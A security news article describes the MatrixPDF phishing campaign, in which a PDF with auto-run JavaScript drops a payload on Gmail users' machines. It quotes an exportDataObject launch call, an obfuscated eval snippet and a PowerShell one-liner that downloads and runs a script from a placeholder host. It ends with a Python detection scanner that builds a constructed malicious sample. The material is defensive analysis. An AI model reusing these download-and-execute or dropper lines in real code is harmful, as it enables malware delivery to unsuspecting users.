MatrixPDF Attacks Gmail Users, Bypassing Email Filters and Fetching a Malicious Payload


In recent weeks, a novel malware campaign dubbed MatrixPDF has surfaced, targeting Gmail users with carefully crafted emails that slip past conventional spam and phishing filters.

This campaign has been active since mid-September 2025 and leverages PDF attachments that, when opened, initiate a stealthy infection chain designed to exfiltrate sensitive information and deliver additional payloads.

Early indicators suggest that attackers are exploiting trust in PDF documents by embedding obfuscated scripts and leveraging legitimate cloud hosting services to host malicious payloads, making detection significantly more challenging.

The initial wave of attacks delivered emails masquerading as internal organizational communications, complete with realistic headers and sender addresses spoofed to resemble trusted corporate domains.

Each email contains a PDF attachment named MatrixDoc.pdf, which appears harmless in preview. However, the PDF is crafted with malformed objects and an embedded JavaScript action that automatically executes when the document is opened in compatible viewers.

Researchers noted that the JavaScript code employs customized obfuscation techniques, including string concatenation and nonstandard encoding schemes, to evade static analysis.


Varonis analysts identified the MatrixPDF campaign after observing unusual PDF parsing errors across several high-profile enterprise networks.

JavaScript actions in MatrixPDF, including fake prompts & redirect buttons (Source – Varonis)

Examination of the malicious documents revealed that the embedded script uses the util.printf() function to dynamically reconstruct and execute a PowerShell command.

By chaining multiple decoding routines, the malware ultimately invokes:

this.exportDataObject({cName: "payload.scr", nLaunch: 2});

triggering the execution of a secondary executable disguised as a screensaver file. The PowerShell payload then reaches out to a cloud storage bucket to download additional modules, establishing command-and-control communications.

Further analysis exposed that once the secondary payload is active, it registers a persistence mechanism by creating a hidden scheduled task named MatrixUpdater.

This task runs every hour, ensuring that the malware can update itself or fetch new instructions without user intervention. Detection evasion is enhanced through intermittent network connections and randomized task names that change with each infection.

Infection Mechanism

Delving into the infection mechanism, MatrixPDF begins with PDF JavaScript exploiting the exportDataObject API to extract and launch the malicious .scr file.

Desktop PDF reader displaying a warning of an external connection (Source – Varonis)

The embedded script reconstructs a Base64-encoded PowerShell command by piecing together multiple string fragments. A representative snippet is shown below:

var part1 = "ZXh0cmFjdC5GaWxl";
var part2 = "LmQ=";
var combined = util.stringFromStream(util.createStream({
  cData: part1 + part2
}));
eval(combined);

This obfuscation technique ensures that signature-based defenses struggle to flag the script. Once decoded, the command executes:

IEX (New-Object Net.WebClient).DownloadString('https://cloudhost.example.com/update.ps1')

which retrieves and runs a PowerShell script responsible for deploying the main payload. The script also leverages the Windows Management Instrumentation (WMI) service to check for existing infections, preventing duplicate installations.

Upon successful download, the PowerShell script writes the payload to %APPDATA%\Local\Matrix\matrix.exe and configures a hidden scheduled task for persistence.

Through its layered approach, MatrixPDF demonstrates a sophisticated blend of social engineering, scripting abuse, and legitimate hosting infrastructure to compromise Gmail users while maintaining a low forensic footprint.

Continuous monitoring and heuristic-based PDF analysis are essential to detect and mitigate this emerging threat.
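A heuristic triage pass of the kind the article calls for, written here as an added example rather than Varonis' own tooling: it scans raw PDF bytes for the OpenAction/JavaScript/EmbeddedFile combination and the exportDataObject call described above, inflating Flate-compressed streams and decoding hex-escaped names first so that neither trick hides the script. The sample document and its object layout are constructed for the demonstration and are not the real MatrixDoc.pdf.

```python
import re
import zlib

# PDF name tokens that should not appear in an ordinary document attachment,
# plus the API calls named in the write-up (exportDataObject / util.printf).
SUSPICIOUS_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile")
SUSPICIOUS_STRINGS = (b"exportDataObject", b"nLaunch", b"util.printf", b"eval(")

def normalise_names(data: bytes) -> bytes:
    """Decode #xx escapes so an obfuscated /Java#53cript matches /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def inflate_streams(data: bytes) -> bytes:
    """Return the raw bytes plus the inflated body of every FlateDecode stream."""
    parts = [data]
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.S):
        try:  # decompressobj tolerates the trailing newline before 'endstream'
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:  # not Flate data; the raw copy is still scanned
            pass
    return b"\n".join(parts)

def triage_pdf(data: bytes) -> dict:
    """Count risky tokens across raw and inflated content (hex names decoded)."""
    body = normalise_names(inflate_streams(data))
    return {t.decode(): body.count(t) for t in SUSPICIOUS_NAMES + SUSPICIOUS_STRINGS if t in body}

def is_high_risk(findings: dict) -> bool:
    """MatrixPDF pattern: a script that runs on open and drops or launches a file."""
    script = "/JavaScript" in findings or "/JS" in findings
    auto_run = "/OpenAction" in findings or "/AA" in findings
    dropper = any(k in findings for k in ("/EmbeddedFile", "/Launch", "exportDataObject"))
    return script and auto_run and dropper

# Constructed sample (not the real MatrixDoc.pdf): the action script is
# Flate-compressed and the /JavaScript name is hex-escaped, which a naive
# grep of the raw file would miss.
_JS = b'this.exportDataObject({cName: "payload.scr", nLaunch: 2});'
_DEFLATED = zlib.compress(_JS)
SAMPLE_MALICIOUS = (
    b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /Java#53cript /JS 4 0 R >> endobj\n"
    b"4 0 obj << /Filter /FlateDecode /Length " + str(len(_DEFLATED)).encode()
    + b" >>\nstream\n" + _DEFLATED + b"\nendstream\nendobj\n"
    b"5 0 obj << /Type /EmbeddedFile /Length 0 >>\nstream\n\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n")
SAMPLE_BENIGN = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                 b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")
```

Run `is_high_risk(triage_pdf(open(path, "rb").read()))` over quarantined attachments; a true result means the file combines an auto-run script with a drop-or-launch capability and deserves sandbox detonation rather than delivery.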


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.